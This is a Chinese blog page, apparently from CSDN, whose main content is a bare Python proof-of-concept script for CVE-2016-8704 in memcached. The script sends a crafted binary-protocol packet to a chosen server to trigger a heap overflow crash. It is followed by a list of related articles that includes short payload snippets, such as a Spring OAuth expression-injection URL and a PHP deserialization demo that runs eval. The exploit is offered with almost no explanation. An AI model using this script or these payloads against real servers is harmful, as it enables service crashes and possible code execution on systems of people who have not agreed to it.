cve -2016-8704

最新推荐文章于 2024-07-13 14:32:36 发布
最新推荐文章于 2024-07-13 14:32:36 发布
阅读量910 收藏
点赞数 1
分类专栏: cve 
import struct
import socket
import sys

MEMCACHED_REQUEST_MAGIC = "\x80"
OPCODE_PREPEND_Q = "\x1a"
key_len = struct.pack("!H",0xfa)
extra_len = "\x00"
data_type = "\x00"
vbucket = "\x00\x00"
body_len = struct.pack("!I",0)
opaque = struct.pack("!I",0)
CAS = struct.pack("!Q",0)
body = "A"*1024

if len(sys.argv) != 3:
        print "./poc_crash.py <server> <port>"

packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len
packet += data_type + vbucket + body_len + opaque + CAS
packet += body

set_packet = "set testkey 0 60 4\r\ntest\r\n"
get_packet = "get testkey\r\n"

s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((sys.argv[1],int(sys.argv[2])))
s1.sendall(set_packet)
print s1.recv(1024)
s1.close()


s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((sys.argv[1],int(sys.argv[2])))
s2.sendall(packet)
print s2.recv(1024)
s2.close()

s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s3.connect((sys.argv[1],int(sys.argv[2])))
s3.sendall(get_packet)
s3.recv(1024)
s3.close()

老外写的代码 ,漏洞在于发现
Z000000Y
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Memcached命令执行漏洞(CVE-2016-8704CVE-2016-8705、CVE-2016-8706)原理和对阿里云Memcache影响分析...
weixin_33929309的博客
11-09 2321
漏洞简介 Memcached是一个广泛使用的高速缓存系统,近期研究者发现小于1.4.33的版本存在3个整数溢出漏洞,通过这几个漏洞攻击者可以触发堆溢出导致crash。官方在11月1日发布了升级公告。漏洞作者已经提供了很详细的描述,在这里仅做简单的整理和验证。 后面验证了阿里云ApsaraDB for Memcache不受漏洞影响,并分析了原因。这个案例深...
绿盟科技互联网安全威胁周报2016.31 Memcached多个整数溢出漏洞CVE-2016-8704
weixin_34072159的博客
09-01 752
绿盟科技发布了本周安全通告,周报编号NSFOCUS-16-31,绿盟科技漏洞库本周新增31条,其中高危21条。本次周报建议大家关注持续关注Memcached多个整数溢出漏洞CVE-2016-8704CVE-2016-8705、CVE-2016-8706,目前官方已发布修补后的最新版本,请广大用户检查自身Memcache版本,尽快升级。 焦点漏洞 ...
php反序列化&基本pop链构造&魔术方法流程&漏洞触发条件&属性修改&属性类型特征&CVE绕过漏洞&字符串逃逸&原生类
m0_70535581的博客
07-13 1885
PHP中的反序列化(unserialization)是将序列化(serialization)后的数据重新转换为PHP对象或数据结构的过程。序列化是将PHP对象转换为可以存储或传输的字符串表示形式的过程,而反序列化则是将这些字符串再转换回原始的PHP对象或数据结构。解释:为了解决开发中数据传输和数据解析的一个情况(例如购买组装电脑,发货过来都是单个零件的,到货之后再重新组装起来)
Memcached远程代码执行漏洞预警
煜铭2011
11-03 6700
一、漏洞基本信息 CVE编号: CVE-2016-8704 - Memcached Append/Prepend 远程代码执行漏洞 CVE-2016-8705 - Memcached Update 远程代码执行漏洞 CVE-2016-8706 - Memcached SASL身份验证远程代码执行漏洞 漏洞发布日期:2016.10.30 受影响的软件及系统:Memcached 1.4.3
2024年全国职业院校技能大赛“ 信息安全管理与评估” 测试题_经济社会的道德大多只在信息采集,加工,存储。传播和利用等活动的各个环节中规
2401_83621499的博客
04-17 919
朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~19、SYN 攻击属于 DOS 攻击的一种,它利用()协议缺陷,通过发送大量的半连。二、 多选题 ( 每题 3 3 分 ,共 共 0 10 题,共 共 0 30 分)20、外部数据包过滤路由器只能阻止一种类型的 IP 欺骗,即(),而不能阻止。
CVE-2016-1000031 Apache Commons FileUpload 反序列化漏洞深入分析
热门推荐
沧海一粟
02-20 1万+
反序列化漏洞最近一直不得安宁,先有Apache Commons Collections通过反序列化实现远程代码执行,再有Spring RMI 反序列化漏洞,最新又有了common upload file的反序列化漏洞CVE-2016-1000031(https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000031) 漏洞原因 先来看
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
[漏洞预警] IE远程代码执行0day漏洞在野攻击,后附解决方案
blackorbird的博客
12-20 207
漏洞公告:今天,我们在收到Google提供的有关针对性攻击中使用的新漏洞的报告后,发布了Internet Explorer安全更新。已启用Windows Update并...
Apache Shiro 反序列化(CVE-2016-4437)复现
m0_48520508的博客
08-03 1648
0x01简介 这个漏洞属于java反序列化漏洞的一种,shiro是java的一个开发框架执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 官网漏洞说明:https://issues.apache.org/jira/browse/SHIRO-550 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRemember
Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977)
来到了学渣的博客
11-09 1876
访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要命令执行需要把执行结果带外才行,java的命令执行漏洞基本需要编码 http://www.jackson-t.ca/runti
[漏洞] CVE-2017-1000364/CVE-2017-1000365/CVE-2017-1000366
唐僧没有肉的博客
08-03 2934
CVE-2017-1000365 CVE-2017-1000365为次级漏洞,主要漏洞是CVE-2017-1000364(针对于内核)和 CVE-2017-1000366(针对于 glibc)。   # 我生产环境都是rhel6 # 升级前测试: # kernel升级:   [root@standbysrc]# rpm -Uvh dracut-* ke
体验ImageMagick 命令执行漏洞(CVE-2016–3714)的PoC
公众号shadow sock7
09-09 3440
首先安装好docker。环境地址GitHub地址: https://github.com/Medicean/VulApps 镜像地址: https://hub.docker.com/r/medicean/vulapps/ 镜像的各种Tag: https://hub.docker.com/r/medicean/vulapps/tags/ 环境搭建获取镜像$ docker pull medi
CISCO 零日漏洞 CVE-2016-6415,由NSA方程组泄露档案中探得
nani1114的博客
09-22 2561
NSA方程式小组泄露档案中暗藏新漏洞 思科(CISCO)揭示了一个新的0day漏洞——CVE-2016-6415,由影子经纪人盗取NSA方程式小组的档案中发现。 今年8月,一组叫做影子经纪人的黑客入侵了NSA(国家安全局)的御用黑客方程组组织,一时间闹得沸沸扬扬,并泄露了大约300兆的私密信息和黑客工具。 2015年二月卡巴斯基的安全研究人员揭示了方程式小组的确存在。他们
weblogic node maanger 远程命令执行漏洞
blogfeifei
10-19 148
1.找到5556的SSL端口 ncat --ssl ip 5556 输出HELLO +OK Node manager v10.3 started 2.设置domain DOMAIN my_domain \\ip\c$ +OK Current domain set to 'my_domain' 3.USER weblogic PASS weblogic 4.执行命令 EXECSC...
物流物流物流物流物流物流物流物流
最新发布
09-09
物流物流物流物流物流物流物流物流
CVE-2016-7249
01-20
CVE-2016-7249是一个PHP反序列化漏洞。该漏洞存在于PHP的unserialize()函数中,攻击者可以通过构造恶意的序列化数据来执行任意代码。这个漏洞的利用方式与CVE-2016-7124类似,都是通过利用PHP的魔术方法来执行恶意代码。 下面是一个简单的演示代码,用于说明CVE-2016-7249漏洞的利用过程: ```php <?php class Example { public $data; public function __destruct() { eval($this->data); } } $payload = 'O:7:"Example":1:{s:4:"data";s:10:"phpinfo();";}'; // 恶意的序列化数据 $obj = unserialize($payload); // 反序列化 ?> ``` 在上面的代码中,我们构造了一个名为Example的类,其中包含一个名为data的属性。在Example类的__destruct()方法中,我们使用eval()函数执行了$data变量中的代码。在反序列化时,我们传入了一个恶意的序列化数据,其中data属性被设置为"phpinfo();",这将导致执行phpinfo()函数。 需要注意的是,CVE-2016-7249是一个已经被修复的漏洞,因此在最新版本的PHP中已经不存在这个漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值